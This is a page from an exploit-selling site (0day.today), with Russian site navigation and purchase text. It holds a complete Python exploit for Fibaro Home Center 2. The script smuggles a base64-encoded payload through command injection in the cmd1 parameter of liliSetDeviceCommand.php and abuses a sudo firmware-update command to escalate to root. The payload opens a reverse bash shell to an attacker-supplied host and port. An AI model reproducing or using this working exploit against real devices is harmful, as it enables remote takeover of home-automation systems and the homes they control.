0day.today - наибольшая база данных эксплоитов в мире.
![](/img/logo_green.jpg)
Мы используем один основной домен 0day.today
Если Вы желаете приобрести эксплоит или заплатить за услуги - Вам необходимо приобрести Золото (Gold). Мы не хотим чтобы Вы использовали наш сайт как инструмент для взломов, поэтому любые действия, которые могут незаконно влиять на других пользователей или на сайты, к которым у Вас нет прав доступа будут запрещены и Ваш профиль со всей вложенной информацией будет уничтожен.
Администрация сайта использует официальные контакты. Опасайтесь обманщиков!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
- Прочитайте [ соглашение ]
- Прочитайте [ Отправить ] правила
- Посетите страницу [ faq ] page
- [ Зарегистрируйте ] профиль
- Получите [ Gold ]
- Если Вы хотите [ продать ]
- Если Вы хотите [ купить ]
- Если Вы потеряли [ Счет ]
- Любые вопросы [ [email protected] ]
- Страница авторизации
- Страница регистрации
- Страница восстановления
- Страница FAQ
- Страница контактов
- Правила публикации
- Страница с соглашением
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Вы можете связаться с нами по:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Fibaro Home Center 2 - Remote Command Execution / Privilege Escalation Exploit
Автор
Риск
![](/img/risk/critlow_4.gif)
Security Risk Critical
]0day-ID
Категория
Дата добавления
Платформа
#!/usr/bin/python import requests import argparse import urllib import base64 import tarfile import os parser = argparse.ArgumentParser(description='Fibaro RCE') parser.add_argument('--rhost') parser.add_argument('--lhost') parser.add_argument('--lport') args = parser.parse_args() f = open('run.sh', 'w') f.write('#!/bin/bash\n') f.write('/bin/bash -i >& /dev/tcp/' + args.lhost + '/' + args.lport + ' 0>&1\n') f.close() os.chmod('run.sh', 0777) tar = tarfile.open("root.tar.gz", "w:gz") tar.add("run.sh") tar.close() with open("root.tar.gz", "rb") as tarfile: tar64 = base64.b64encode(tarfile.read()) wwwexec = urllib.quote_plus(base64.b64encode("echo '" + tar64 + "' | base64 -d > /tmp/patch.tar.gz && sudo update --manual /tmp/patch.tar.gz")) os.remove('run.sh') os.remove('root.tar.gz') headers = { 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:51.0) Gecko/20100101 Firefox/51.0', 'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8', 'X-Fibaro-Version': '2', 'X-Requested-With': 'XMLHttpRequest', } data = 'deviceID=1&deviceName=&deviceType=&cmd1=`echo${IFS}' + wwwexec + '|base64${IFS}-d|/bin/bash`&cmd2=&roomID=1&roomName=§ionID=§ionName=&lang=en' print "[+] Popping a root shell..." requests.post('http://' + args.rhost + '/services/liliSetDeviceCommand.php', headers=headers, data=data, verify=False) # 0day.today [2024-07-02] #